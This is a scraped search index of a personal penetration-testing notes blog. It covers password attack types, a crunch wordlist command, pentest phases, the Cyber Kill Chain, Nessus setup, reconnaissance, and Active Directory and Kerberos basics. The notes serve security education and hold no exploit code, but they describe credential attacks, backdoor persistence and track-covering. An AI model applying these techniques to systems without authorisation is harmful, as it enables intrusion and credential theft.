Let\u0026rsquo;s generate: # options sample crunch \u0026lt;min-length\u0026gt; \u0026lt;max-length\u0026gt; [options] -o output_file.txt To create a custom wordlist with a fixed length of 4 characters, which can be a combination of characters from 0 to 9 and A to C, use the command: crunch 4 4 0123456789ABC -o output_file_2.txt Crunch created 28,561 possible combinations of passwords.\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/07-performing-network-penetration-testing/00-intro/","summary":"\u003cul\u003e\n\u003cli\u003eIn this chapter, we will cover the following topics:\n• Exploring password-based attacks\n• Performing host discovery\n• Identifying and exploiting vulnerable services\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2 id=\"password-based-attacks\"\u003ePassword based attacks:\u003c/h2\u003e\n\u003cp\u003e\u003cem\u003eOBJECTIVES:\u003c/em\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eGaining unauthorized access to remote hosts on a network by performing attacks against its authentication system\u003c/li\u003e\n\u003cli\u003eRetrieving the password associated with cryptographic hashes\u003c/li\u003e\n\u003cli\u003eRetrieving the password to access a password-protected sensitive file\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2 id=\"different-types-of-password-attacks\"\u003eDifferent types of password attacks:\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eBrute-force attack\u003c/code\u003e: In a brute-force attack, every possible combination is tried against the system. This is a very time-consuming process as every possible password combination is tested against the authentication system of the target until the valid password is retrieved. 
While this method may seem to be the best method, the time constraints given for completing a penetration test are often not achievable.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eDictionary attack\u003c/code\u003e: In a dictionary attack, the threat actor uses a pre-populated wordlist that contains thousands or even millions of candidate passwords. These are tested against the authentication system of the target. Each word from the wordlist is tested; however, the attack will not be successful if a valid password is not found within the wordlist being used by the threat actor.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePassword guessing\u003c/code\u003e: This is a common technique that’s used by many people, even threat actors and penetration testers, who are attempting to gain unauthorized access to a system. I have often seen IT professionals use simple and even default passwords on their networking devices, security appliances, and even the client and server systems within their organization. For instance, by performing a Google dork using common default passwords, you will easily find default passwords for various systems. These default passwords are set by the manufacturer of the device.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePassword cracking\u003c/code\u003e: In this technique, the threat actor uses various tools and techniques to retrieve valid user credentials to gain unauthorized access to a system. Sometimes, a threat actor may capture a user’s password in transit across a network in plaintext by an unsecure network protocol, or even retrieve the cryptographic hash of a password.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePassword spraying\u003c/code\u003e: This is the technique where a threat actor uses a single password and tests it against an authentication system with different usernames. The password is a guessable password, obtained from data breaches or a wordlist. 
The idea is to test which user account within a specific list uses the same password. This technique is good when testing which users\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eCredential stuffing\u003c/code\u003e: This technique allows a threat actor to use a common wordlist of usernames and passwords against the authentication system of a target host. This technique checks which combination of usernames and passwords leads to valid user credentials.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eOnline password attack\u003c/code\u003e: In an online password attack, the threat actor attempts to gain unauthorized access to a host that is running a network service or a remote access service. This allows authorized users to log in to the system across a network. A simple example of an online password attack is a threat actor attempting to retrieve the username and password of a valid user to gain access to a server that is running the \u003ccode\u003eRemote Desktop Protocol (RDP)\u003c/code\u003e. Keep in mind that online password attacks focus on using a combination of passwords from a wordlist directly on a web login page or network service interface until the correct one is found.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eOffline password attack\u003c/code\u003e: In an offline password attack, the threat actor uses various tools and techniques to retrieve the valid password of a password-protected file, such as a document, or even the cryptographic hash of a user’s password. A simple example of this is capturing a domain administrator’s username and password hash from network packets. 
The username is usually in plaintext but you may need/want to retrieve the password from the hash value.\u003c/li\u003e\n\u003c/ul\u003e\n\n            \u003clink rel=\"stylesheet\" href=\"/css/vendors/admonitions.4fd9a0b8ec8899f2ca952048d255a569f433f77dfb3f52f5bc87e7d65cdce449.css\" integrity=\"sha256-T9mguOyImfLKlSBI0lWlafQz9337P1L1vIfn1lzc5Ek=\" crossorigin=\"anonymous\"\u003e\n    \u003cdiv class=\"admonition important\"\u003e\n      \u003cdiv class=\"admonition-header\"\u003e\u003csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 512 512\"\u003e\u003cpath d=\"M256 512A256 256 0 1 0 256 0a256 256 0 1 0 0 512zm0-384c13.3 0 24 10.7 24 24l0 112c0 13.3-10.7 24-24 24s-24-10.7-24-24l0-112c0-13.3 10.7-24 24-24zM224 352a32 32 0 1 1 64 0 32 32 0 1 1 -64 0z\"/\u003e\u003c/svg\u003e\n        \u003cspan\u003eImportant\u003c/span\u003e\n      \u003c/div\u003e\n      \u003cdiv class=\"admonition-content\"\u003e\n        \u003cp\u003eSecLists is a collection of pre-built wordlists containing passwords and usernames that are commonly used by penetration testers to perform both online and offline dictionary attacks. Furthermore, SecLists contains URLs, sensitive data patterns, and fuzzing payloads, which are valuable to penetration testers. You can find the SecLists collections at \u003ca href=\"https://github.com/danielmiessler/SecLists\"\u003ehttps://github.com/danielmiessler/SecLists\u003c/a\u003e. 
Additionally, you can use the wordlists command within Kali Linux to view the local wordlist repository that is already pre-loaded within the operating system\u003c/p\u003e","title":"Introduction to Network Penetration Testing"},{"content":"• Introduction to network penetration testing • Working with bind and reverse shells • Antimalware evasion techniques • Working with wireless adapters • Managing and Monitoring wireless modes\nThe following are typical phases of network penetration testing:\nDefining the scope: The scope provides a clear understanding of which systems and networks are to be tested and whether specific tools or techniques are restricted. Performing reconnaissance: This is the information-gathering phase, where the penetration tester performs both passive and active reconnaissance on the target. Scanning and enumeration: The scanning and enumeration phase is commonly used to collect specific details and information about the target such as open ports, running services, and operating systems, and identify user accounts, network shares, and configurations on targeted systems. Vulnerability analysis: During this phase, the penetration tester analyzes the collected data from the previous phases to identify any potential security vulnerabilities on the target, determine their severity and risk rating, and identify countermeasures to help the organization improve their cyber defenses. Exploitation: In this phase, the ethical hacker or penetration tester attempts to exploit each security vulnerability found on a targeted system using both manual and automated techniques to determine whether the security vulnerability actually exists and gain a foothold on the target. Post-exploitation: Once a targeted system is compromised, the penetration tester will attempt to expand their foothold further into the compromised system and onto other systems within scope. 
During this phase, the penetration tester can identify additional security vulnerabilities on the target. Reporting: This is one of the most important phases during any penetration test. The penetration tester is required to provide a detailed technical and executive report to the stakeholders of the targeted organization with information about the security assessment, the techniques used to discover the security vulnerabilities, the security vulnerabilities that were found, and recommendations on how to improve the security posture of the targeted system. Remediation: Based on the information in the report, the organization can implement the necessary steps needed to remediate the identified security vulnerabilities on the targeted system. The process may involve applying security controls and patches and improving the configuration of systems and devices. Some examples of security controls may include network segmentation, encryption, access controls, and intrusion detection systems (IDSs). The vulnerability rating and severity should be used to help organizations prioritize higher-risk vulnerabilities and allocate resources to remediate them. Penetration testing encompasses a broad range of activities beyond identifying patch management inefficiencies. These activities include testing application-layer vulnerabilities, network-layer vulnerabilities, and human-based (social engineering) vulnerabilities. In addition, this helps organizations thoroughly assess their cyber defenses and determine whether their systems, networks and infrastructure are compliant with various industry standards and frameworks. For instance, organizations that process a payment card system are required to be Payment Card Industry Data Security Standard (PCI DSS)-compliant to protect sensitive data during a payment transaction. 
","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/06-understading-network-pentesing/00-intro/","summary":"\u003cp\u003e• Introduction to network penetration testing\n• Working with bind and reverse shells\n• Antimalware evasion techniques\n• Working with wireless adapters\n• Managing and Monitoring wireless modes\u003c/p\u003e\n\u003chr\u003e\n\u003cp\u003eThe following are typical phases of network penetration testing:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\u003ccode\u003eDefining the scope\u003c/code\u003e: The scope provides a clear understanding of which systems and networks are to be tested and whether specific tools or techniques are restricted.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePerforming reconnaissance\u003c/code\u003e: This is the information-gathering phase, where the penetration tester performs both passive and active reconnaissance on the target.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eScanning and enumeration\u003c/code\u003e: The scanning and enumeration phase is commonly used to collect specific details and information about the target such as open ports, running services, and operating systems, and identify user accounts, network shares, and configurations on targeted systems.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eVulnerability analysis\u003c/code\u003e: During this phase, the penetration tester analyzes the collected data from the previous phases to identify any potential security vulnerabilities on the target, determine their severity and risk rating, and identify countermeasures to help the organization improve their cyber defenses.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eExploitation\u003c/code\u003e: In this phase, the ethical hacker or penetration tester attempts to exploit each security vulnerability found on a targeted system using both manual and automated techniques to determine whether the security vulnerability actually exists and gain a foothold on the 
target.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePost-exploitation\u003c/code\u003e: Once a targeted system is compromised, the penetration tester will attempt to expand their foothold further into the compromised system and onto other systems within scope. During this phase, the penetration tester can identify additional security vulnerabilities on the target.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eReporting\u003c/code\u003e: This is one of the most important phases during any penetration test. The penetration tester is required to provide a detailed technical and executive report to the stakeholders of the targeted organization with information about the security assessment, the techniques used to discover the security vulnerabilities, the security vulnerabilities that were found, and recommendations on how to improve the security posture of the targeted system.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eRemediation\u003c/code\u003e: Based on the information in the report, the organization can implement the necessary steps needed to remediate the identified security vulnerabilities on the targeted system. The process may involve applying security controls and patches and improving the configuration of systems and devices. Some examples of security controls may include network segmentation, encryption, access controls, and intrusion detection systems (IDSs). The vulnerability rating and severity should be used to help organizations prioritize higher-risk vulnerabilities and allocate resources to remediate them.\u003c/li\u003e\n\u003c/ol\u003e\n\u003chr\u003e\n\u003cul\u003e\n\u003cli\u003ePenetration testing encompasses a broad range of activities beyond identifying patch management inefficiencies. 
These activities include testing application-layer vulnerabilities, network-layer vulnerabilities, and human-based (social engineering) vulnerabilities.\u003c/li\u003e\n\u003cli\u003eIn addition, this helps organizations thoroughly assess their cyber defenses and determine whether their systems, networks and infrastructure are compliant with various industry standards and frameworks. For instance, organizations that process a payment card system are required to be \u003ccode\u003ePayment Card Industry Data Security Standard (PCI DSS)\u003c/code\u003e-compliant to protect sensitive data during a payment transaction.\u003c/li\u003e\n\u003c/ul\u003e","title":"Introduction to Network Pentesting"},{"content":"Post-exploitation is the phase that occurs after an attacker or penetration tester has successfully compromised a system. Unlike the initial exploitation stage, which focuses on gaining entry, post-exploitation is about leveraging that access to achieve specific objectives. Post- exploitation refers to all the operations that are performed after gaining initial access to the target system. It is done to further gain control of the target system and network.\nDetailed intro coming soon\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/08-post-exploitation-techniques/00-intro/","summary":"\u003cp\u003e\u003ccode\u003ePost-exploitation\u003c/code\u003e is the phase that occurs after an attacker or penetration tester has successfully compromised a system. Unlike the initial exploitation stage, which focuses on gaining entry, post-exploitation is about leveraging that access to achieve specific objectives. Post- exploitation refers to all the operations that are performed after gaining initial access to the target system. 
It is done to further gain control of the target system and network.\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eDetailed intro coming soon\u003c/em\u003e\u003c/p\u003e","title":"Introduction to Post Exploitation"},{"content":"I forgot the username and password for my nessus setup, so here are the steps to troubleshoot the issues:\n# This command will show the existing usernames on your machine sudo /opt/nessus/sbin/nessuscli lsuser # changing the password for a particular username sudo /opt/nessus/sbin/nessuscli chpasswd 0xdf_fak3r Give a new password and you are good to go, navigate to the portal of nessus -\u0026gt; nessus\nScanning with nessus: Start the nessus service using the command sudo /bin/systemctl start nessusd.service, then navigate to https://kali:8834 After login, click on the new scan button: Select advance scan from the options: Fill out these basic details first, and set up the target IP You can customize other settings also, then hit save and Launch. Scan analysis: List of security vulnerabilities.\nClick on any of the vulns: As shown in the preceding screenshot, Nessus also provides the Common Vulnerability Scoring System (CVSS) base score, which is based on a rating from 0-10, where 10 is the most critical and requires immediate attention. Important Cybersecurity professionals within the industry use the CVSS calculator at https://www.first.org/cvss/ to determine the score of vulnerabilities within their systems, networks, and organizations. This calculation helps experts determine the risk factors when determining a severity rating.\n3. 
We can further export the results of the scan into different formats.\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/05-vulnerability-assessment/00-nessus/","summary":"\u003cp\u003eI forgot the username and password for my \u003ccode\u003enessus\u003c/code\u003e setup, so here are the steps to troubleshoot the issues:\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# This command will show the existing usernames on your machine\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo /opt/nessus/sbin/nessuscli lsuser\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# changing the password for a particular username\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo /opt/nessus/sbin/nessuscli chpasswd 0xdf_fak3r\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eGive a new password and you are good to go, navigate to the portal of \u003ccode\u003enessus\u003c/code\u003e -\u0026gt; \u003ca href=\"https://kali:8834\"\u003enessus\u003c/a\u003e\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"scanning-with-nessus\"\u003eScanning with nessus:\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eStart the \u003ccode\u003enessus\u003c/code\u003e service using the command \u003ccode\u003esudo /bin/systemctl start nessusd.service\u003c/code\u003e, then navigate to \u003ccode\u003ehttps://kali:8834\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAfter login, click on the \u003ccode\u003enew scan\u003c/code\u003e button:\n\u003cimg alt=\"nessus_1\" loading=\"lazy\" 
src=\"/images/Pentesting/NP/VA/00/nessus_1.png\"\u003e\u003c/li\u003e\n\u003cli\u003eSelect \u003ccode\u003eadvance scan\u003c/code\u003e from the options:\n\u003cimg alt=\"nessus_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/VA/00/nessus_2.png\"\u003e\u003c/li\u003e\n\u003cli\u003eFill out these basic details first, and set up the target IP\n\u003cimg alt=\"nessus_3\" loading=\"lazy\" src=\"/images/Pentesting/NP/VA/00/nessus_3.png\"\u003e\u003c/li\u003e\n\u003cli\u003eYou can customize other settings also, then hit save and Launch.\n\u003cimg alt=\"nessus_4\" loading=\"lazy\" src=\"/images/Pentesting/NP/VA/00/nessus_4.png\"\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003chr\u003e\n\u003ch3 id=\"scan-analysis\"\u003eScan analysis:\u003c/h3\u003e\n\u003cp\u003e\u003cimg alt=\"nessus_5\" loading=\"lazy\" src=\"/images/Pentesting/NP/VA/00/nessus_5.png\"\u003e\nList of security vulnerabilities.\u003c/p\u003e","title":"Nessus"},{"content":"Penetration Testing basics: Pre-engagement: NDA: An NDA is a legal agreement that specifies that a penetration tester and their employer will not share or hold onto any sensitive or proprietary information that is encountered during the assessment.\nRoE: The scope of a penetration test, also known as the rules of engagement, defines the systems the penetration tester can and cannot hack. This ensures the penetration tester remains within legal boundaries.\nThe following are some sample pre-engagement questions to help you define the scope of a penetration test: • What is the size/class of your external network? (Network penetration testing) • What is the size/class of your internal network? (Network penetration testing) • What is the purpose and goal of the penetration test? (Applicable to any form of penetration testing) • How many pages does the web application have? 
(Web application penetration testing) • How many user inputs or forms does the web application have?\nInformation Gathering: Penetration testing involves information gathering, which is vital to ensure that penetration testers have access to key information that will assist them in conducting their assessment. Seasoned professionals normally spend a day or two conducting extensive reconnaissance on their target. The more that is known about the target, the easier it is for the penetration tester to identify the attack surface, such as points of entry in the target\u0026rsquo;s systems and networks.\nThreat modeling: Threat modeling is a process used to assist penetration testers and network security defenders to better understand the threats that inspired the assessment or the threats that the application or network is most prone to. This data is then used to help penetration testers simulate, assess, and address the most common threats that the organization, network, or application faces.\nThe following are some threat modeling frameworks: • Spoofing, Tampering, Repudiation, Information disclosure, Denial of service and Elevation of privilege (STRIDE) • Process for Attack Simulation and Threat Analysis (PASTA)\nVulnerability Analysis: Vulnerability analysis typically involves the assessors or penetration testers running vulnerability or network/port scans to better understand which services are on the network or the applications running on a system and whether there are any vulnerabilities in any systems included in the scope of the assessment. This process often includes manual vulnerability discovery and testing, which is often the most accurate form of vulnerability analysis or vulnerability assessment.\nExploitation: Exploitation is the ammunition or evidence that helps articulate why the vulnerability matters and illustrates the impact that the vulnerability could have on the organization. 
Furthermore, without exploitation, the assessment is not a penetration test and is nothing more than a vulnerability assessment.\nPost-exploitation: The process of post-exploitation is the continuation of this step, where the foothold gained is leveraged to access data or spread to other systems via lateral movement techniques within the target network. During post-exploitation, the primary goal is typically to demonstrate the impact that the vulnerability and access gained can pose to the organization. This impact assists in helping executive leadership to better understand the vulnerabilities and the damage they could cause to the organization if a real cyber-attack was to occur.\nReport writing: Report writing involves much more than listing a few vulnerabilities discovered during the assessment. It is the medium through which you convey risk and business impact, summarize your findings, and include remediation steps. A good penetration tester needs to be a good report writer, or the issues they find will be lost and may never be understood by the client who hired them to conduct the assessment.\nApproaches of penetration testing: Black Box - Negligible information is provided. White Box - Much more information is provided during the pen test. Grey Box - Hybrid approach. Phases of hacking: How a hacker approaches a target: Reconnaissance/information gathering: The reconnaissance or information gathering phase is where the threat actor focuses on acquiring meaningful information about their target. This is the most important phase in hacking: the more details known about the target, the easier it is to compromise a weakness and exploit it.\nScanning and enumeration: The second phase of hacking is scanning. Scanning involves using a direct approach in engaging the target to obtain information that is not accessible via the reconnaissance phase. 
Techniques: • Checking for any live systems • Checking for firewalls and their rules • Checking for open network ports • Checking for running services • Checking for security vulnerabilities • Creating a network topology of the target network\nGaining access: This phase can sometimes be the most challenging phase of them all. In this phase, the threat actor uses the information obtained from the previous phases to exploit the target. Upon successful exploitation of vulnerabilities, the threat actor can then remotely execute malicious code on the target and gain remote access to the target system. The following can occur once access is gained: • Password cracking • Exploiting vulnerabilities • Escalating privileges • Hiding files\nMaintaining access: After exploiting a system, the threat actor should usually ensure that they are able to gain access to the victim\u0026rsquo;s system at any time as long as the system is online. This is done by creating backdoor access to the target and setting up multiple persistence connections between the attacker\u0026rsquo;s machines and the victim\u0026rsquo;s system. The objectives of maintaining access are as follows: • Lateral movement • Exfiltration of data • Creating backdoor and persistent connections\nCovering tracks: The last phase is to cover your tracks. This ensures that you do not leave any traces of your presence on a compromised system or network. As penetration testers, we would like to be as undetectable as possible on a target\u0026rsquo;s network, not triggering any alerts on security sensors and appliances while we remove any residual traces of the actions performed during the penetration test. 
Covering your tracks ensures that you don\u0026rsquo;t leave any trace of your presence on the network, as a penetration test is designed to be stealthy and simulate real-world attacks on an organization.\nThe cyber kill chain framework: The Cyber Kill Chain is a seven-stage framework developed by Lockheed Martin, an American aerospace corporation. This framework outlines each critical step a threat actor will need to perform before they are successful in meeting the objectives and goals of the cyber-attack against their targets. Reconnaissance: As with every battle plan, it\u0026rsquo;s important to know a lot about your opponent before starting a war. The reconnaissance stage is focused on gathering a lot of information and intelligence about the target, whether it\u0026rsquo;s a person or an organization.\nImportant The reconnaissance stage involves both passive and active information gathering techniques, which will be covered in later sections of this book. You will also discover tools and techniques to improve your information skills when performing a penetration testing engagement.\nWeaponization: Using the information gathered from the reconnaissance phase, the threat actor and penetration tester can use it to better craft a weapon, better referred to as an exploit, that can take advantage of a security vulnerability on the target. The weapon (exploit) has to be specially crafted and tested to ensure its success when launched by the threat actor or the penetration tester. The objective of the exploit is to affect the confidentiality, integrity, and/or availability of the target\u0026rsquo;s systems or networks.\nDelivery: After creating the weapon, the threat actor or the penetration tester has to deliver the weapon onto the target system. Delivery can be done using the creative mindset of the attacker, whether using email messaging, instant messaging services, or even by creating drive-by downloads on compromised web services. 
Another technique can be copying the exploit onto multiple USB drives and dropping them within the compound of the target organization (eavesdropping), with the hope that an employee will find one and connect it to an internal system out of human curiosity.\nWe can use USB Ninja cables, or we can make them on our own. We can also use rubber duckies for attacks like eavesdropping. Exploitation: After the weapon (exploit) is delivered to the target, the attacker needs to ensure that when the exploit is executed, it successfully takes advantage of the security vulnerability on the target system as intended. If the exploit does not work, the threat actor or penetration tester may be detected by the organization\u0026rsquo;s blue team and the Cyber Kill Chain halts. The attacker needs to ensure the exploit is tested properly before executing it on the target system.\nInstallation: After the threat actor has exploited the target system, the attacker will attempt to create multiple persistent backdoor accesses to the compromised system. This allows the threat actor or the penetration tester to have multiple channels of entry back into the system and network. During this stage, additional applications are usually installed while the threat actor takes a lot of precautions to avoid detection by any threat detection systems.\nCommand and control server (C2): An important stage in a cyber-attack is creating Command and Control (C2) connections between the compromised systems and a C2 server on the internet. This allows the threat actor to centrally control a group of infected systems (botnet) using a C2 server that is managed by the attacker. This allows the threat actor to create an army of zombies, all controlled and managed by a single threat actor. Actions and objectives: If the threat actor or the penetration tester is able to reach this stage of the Cyber Kill Chain, the organization\u0026rsquo;s blue team has failed to stop the attacker and prevent the cyberattack. 
At this stage, the threat actor has completed their objectives and achieved the goals of the attack. In this phase, the attacker can complete the main objective of the attack, whether it\u0026rsquo;s exfiltrating data from the organization and selling it on the dark web or even extending their botnet for a larger-scale cyber-attack on another target organization. Stopping the threat actor or the penetration tester at this phase is considered to be extremely difficult as the attacker would have already established multiple persistent backdoor accesses with encrypted C2 connections on multiple compromised systems within the target organization. Furthermore, the threat actor will also be clearing traces of any evidence or artifacts that could help cybersecurity professionals to trace the attack to the threat actor.\nDefending-architecture-whitepapers\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/00-intro-to-hacking/00-penetration-testing-phases/","summary":"\u003ch2 id=\"penetration-testing-basics\"\u003ePenetration Testing basics:\u003c/h2\u003e\n\u003cp\u003e\u003cimg alt=\"pp_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/pp/PP_1.png\"\u003e\u003c/p\u003e\n\u003ch3 id=\"pre-engagement\"\u003ePre-engagement:\u003c/h3\u003e\n\u003cp\u003e\u003cimg alt=\"pp_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/pp/PP_2.png\"\u003e\n\u003cem\u003eNDA:\u003c/em\u003e An NDA is a legal agreement that specifies that a penetration tester and their employer will not share or hold onto any sensitive or proprietary information that is encountered during the assessment.\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eRoE:\u003c/em\u003e The scope of a penetration test, also known as the rules of engagement, defines the systems the penetration tester can and cannot hack. 
This ensures the penetration tester remains within legal boundaries.\u003c/p\u003e","title":"Penetration Testing Phases"},{"content":"Without performing reconnaissance (information gathering) on the target, both threat actors and penetration testers will have difficulties moving on to the later phases of the Cyber Kill Chain. Hence, ethical hackers and penetration testers must conduct extensive research into gathering as much information as possible to create a profile of their target. Reconnaissance can be divided into two categories: • Passive: Uses an indirect approach and does not engage the target to gather information. • Active: Directly engages the target to gather specific details.\nFootprinting: Footprinting is part of the reconnaissance phase; however, since footprinting can provide more specific details about the target, we can consider footprinting to be a subset of the reconnaissance phase.\nFollow the footprints!!!! Footprinting allows a penetration tester to understand the security posture of the target infrastructure, quickly identify security vulnerabilities on the target systems and networks, create a network map of the organization, and reduce the area of focus to the specific IP addresses, domain names, and the types of devices regarding which information is required.\n• Collecting network information (domain names, IP addressing schemes, and network protocols)\n• Collecting system information (user and group names, routing tables, and system names)\n• Collecting organization information (employee details, company directory, and location details)\nDifference between Recon and footprinting: Despite being a subset of reconnaissance, footprinting goes a lot deeper in gathering information without actively interacting with the target. Technically, if we compare passive recon with footprinting it will make a lot more sense. 
In passive recon we just look for basic information that is available online at a surface level; footprinting takes it a step further. I will show some useful steps for deeper footprinting:\n• Checking search engines such as Yahoo, Bing, and Google • Performing Google hacking/dorking techniques (advanced Google searches) • Information gathering through social media platforms such as Facebook, LinkedIn, Instagram, and Twitter • Footprinting the company\u0026rsquo;s website • Performing email footprinting techniques • Using WHOIS databases to retrieve domain information • Performing Domain Name System (DNS) footprinting • Network footprinting techniques • Social engineering techniques\nTry to use as many OSINT techniques as you can at a deeper level, collecting and carrying forward every good piece of information; no piece of information is too small, everything counts.\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/02-reconnaissance/00-reconnaisance-basics/","summary":"\u003cp\u003eWithout performing reconnaissance (information gathering) on the target, both threat actors and penetration testers will have difficulties moving on to the later phases of the Cyber Kill Chain. Hence, ethical hackers and penetration testers must conduct extensive research into gathering as much information as possible to create a profile of their target.\nReconnaissance can be divided into two categories:\n• Passive: Uses an indirect approach and does not engage the target to gather information.\n• Active: Directly engages the target to gather specific details.\u003c/p\u003e","title":"Reconnaissance Basics"},{"content":"For example, imagine you need to change a user’s password on their user account and there are over 100 devices in the network – this can be very challenging. Within Microsoft Windows Server, you will find many roles and features that can be installed and configured to help IT professionals provide many services and resources to everyone on a network. 
One such service within Microsoft Windows Server is known as Active Directory. This is a directory service that helps IT professionals centrally manage the users, groups, devices, and policies within the organization.\nImportant Active Directory stores information about objects on the network and makes this information easy for administrators and users to find and use. Active Directory uses a domain to manage a forest of domains, providing scalable, secure, and manageable infrastructure for user and resource management.\nWith Active Directory running on the network, devices will need to join the Windows domain that is managed by a domain controller. This allows individuals to log in to devices on the domain using their domain user account rather than a local user account stored on an isolated computer. Active Directory allows the following centralized management and security functions to be used:\nManagement of user profiles on clients and servers on the domain. Management of network information and configurations. Centralized management of security policies for users, groups, and devices on the domain. Clients’ registry configurations and policies. When setting up Active Directory on Microsoft Windows Server, you will need to create a forest that defines the logical security boundary for managing the users, groups, and devices of an organization. Within a forest, there can be many domains. A domain is a collection of Organizational Units (OUs) used to organize objects. A forest in Active Directory is essentially a collection of one or more domains that share a common configuration, schema, and global catalog. The term forest is commonly used to represent the highest level of an organization within Active Directory. 
It also defines both the administrative and security boundaries of an entire directory infrastructure.\nThe following are the default supported objects that can be placed within an OU on Active Directory:\n• Users\n• Computers\n• Groups\n• OUs\n• Printers\n• Shared folders\nAn OU is like creating a folder inside our computer and placing items (objects) that share a common factor, such as user accounts of people who work within the same department like CSE/IT/Management etc. This allows us to centrally manage the users, groups, computers etc.\nA group allows you to assign user accounts to a group for easier security management, which means you can create a security policy using a GPO and assign that GPO to the group. Therefore, all users who are members of the group will be affected by the GPO. This is usually for creating and assigning security restrictions to users of a particular department or section within the organization.\nA tree is when there are multiple domains within the same forest in AD. Trees help Domain Admins create logical security boundaries between each domain within the forest itself. Multiple domains can exist within a single forest or multiple forests, which means that IT professionals can configure various types of trust within Active Directory. Implementing a trust model allows users from one domain or forest to access resources in another domain or forest. The concept of trust is especially important for large enterprise organizations.\nTRUST MODELS INSIDE ACTIVE DIRECTORY:\nOne-way trust: Imagine that users within Domain_A can access the resources within Domain_B, but users within Domain_B cannot access the resources within Domain_A. Two-way trust: When using this trust model, users in both trusting and trusted domains can access resources within each other’s domain, so users within Domain_A can access the resources within Domain_B and vice versa. 
Transitive trust: Extending trust - With transitive trust, trust can be extended from one domain to another domain within the same forest. So, transitive trust can be extended from Domain_A to Domain_B, to Domain_C, and so on. By default, transitive trust between domains of the same forest is the same as two-way trust. Non-transitive trust: This type of trust does not extend to other domains within the same forest, but it can be either two-way trust or one-way trust. Remember that non-transitive trust is the default model between two different domains located in different forests, where the forests do not have a trust relationship. Forest trust: This type of trust is created between the forest root domains of different forests and can be either one-way trust or two-way trust, with transitive or non-transitive trust. For penetration testers and ethical hackers, it is important to understand the domain login process. When a user attempts to log in to the domain, the following process occurs:\nThe host sends the user’s domain username and the New Technology LAN Manager (NTLM) version 2 hash of the user’s password to the domain controller during the authentication process to validate the identity of the user (remember our pass-the-hash attacks?). The domain controller determines whether the user credentials are valid. The domain controller responds to the host by defining the security policies to apply to the user (network authentication). This means that a user with a valid domain user account can log in to any permitted device on the network, so long as the security policy permits that action. When a local user account is created on a Windows 10/11 operating system, the user’s credentials are stored within the Security Account Manager (SAM) file located in the local machine’s C:\\Windows\\System32\\config directory. The username is stored in plaintext while the password is converted into an NTLM version 1 hash stored in the SAM file. 
However, when a user is attempting to authenticate on a host within a domain, the host sends the domain username and NTLM version 2 password hash to the domain controller using the Lightweight Directory Access Protocol (LDAP) by default (an unsecure directory protocol used to perform queries on a directory server such as a domain controller over a network).\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/10-active-directory-attacks/00-understanding-active-directory/","summary":"\u003cp\u003eFor example, imagine you need to change a user’s password on their user account and there are over 100 devices in the network – this can be very challenging. Within Microsoft Windows Server, you will find many roles and features that can be installed and configured to help IT professionals provide many services and resources to everyone on a network. One such service within Microsoft Windows Server is known as Active Directory. This is a directory service that helps IT professionals centrally manage the users, groups, devices, and policies within the organization.\u003c/p\u003e","title":"Understanding Active Directory"},{"content":"Kerberos is a network authentication protocol that runs on Windows Server, which enables clients to authenticate on the network and access services within the Windows domain. Kerberos provides single sign-on (SSO), which allows a user to authenticate once on a network and access resources without having to re-enter their user credentials each time they need to access a new resource, such as a mapped network drive. Kerberos supports delegated authentication, which allows a service running on a client’s computer to act on behalf of the authenticated domain user when it connects to other services on the network. Kerberos supports interoperability, which allows a Windows-based operating system to work in other networks that also use Kerberos as their authentication mechanism. 
